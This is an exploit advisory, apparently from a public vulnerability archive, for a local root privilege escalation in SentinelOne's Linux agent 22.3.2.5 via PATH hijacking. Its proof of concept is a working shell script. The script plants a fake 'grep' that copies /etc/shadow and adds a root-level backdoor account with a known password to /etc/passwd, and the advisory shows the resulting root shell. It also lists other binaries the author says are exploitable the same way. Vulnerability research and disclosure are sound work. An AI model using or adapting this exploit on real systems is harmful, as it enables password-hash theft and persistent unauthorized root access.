SentinelOne sentinelagent 22.3.2.5 Privilege Escalation

2022.12.07
Credit: ouch_this_hurts
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-427
CWE-264

Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability Date: 12/06/2022 Exploit Author: ouch_this_hurts Vendor Homepage: https://www.sentinelone.com/ Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas Version: 22.3.2.5 Tested on: Ubuntu 22.04.x CVE: NA Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :) Protips: - If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother. - If you require me to use HackerOne, I'm not going to bother. - If you dont have a security.txt, how do you expect me to contact you? Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick: Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice! PoC below: 1. Find the systems "earliest" `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit. 2. Create the following `grep` file in that directory and make sure its executable: ```shell cat << SENTINELOOPS > /usr/local/bin/grep #!/bin/bash # I think I'll have the passwds pl0x cat /etc/shadow > /tmp/etc_shadow # password is password :) echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd SENTINELOOPS chmod +x /usr/local/bin/grep ``` 3. Wait for machine to reboot, login as `sentinel_oops:password` :) ``` $ su sentinel_oops Password: # whoami root ``` What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`. So there are potentially other ways of privilege escalation via this "agent"? - `grep` as demonstrated above - `pgrep` examining the binary appears to be vulnerable - `xargs` examining the binary appears to be vulnerable - `cat` examining the binary appears to be vulnerable - `pgrep` examining the binary appears to be vulnerable - `ldd` examining the binary appears to be vulnerable - `lsmod` examining the binary appears to be vulnerable - `mksh` examining the binary appears to be vulnerable - `awk` examining the binary appears to be vulnerable [CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top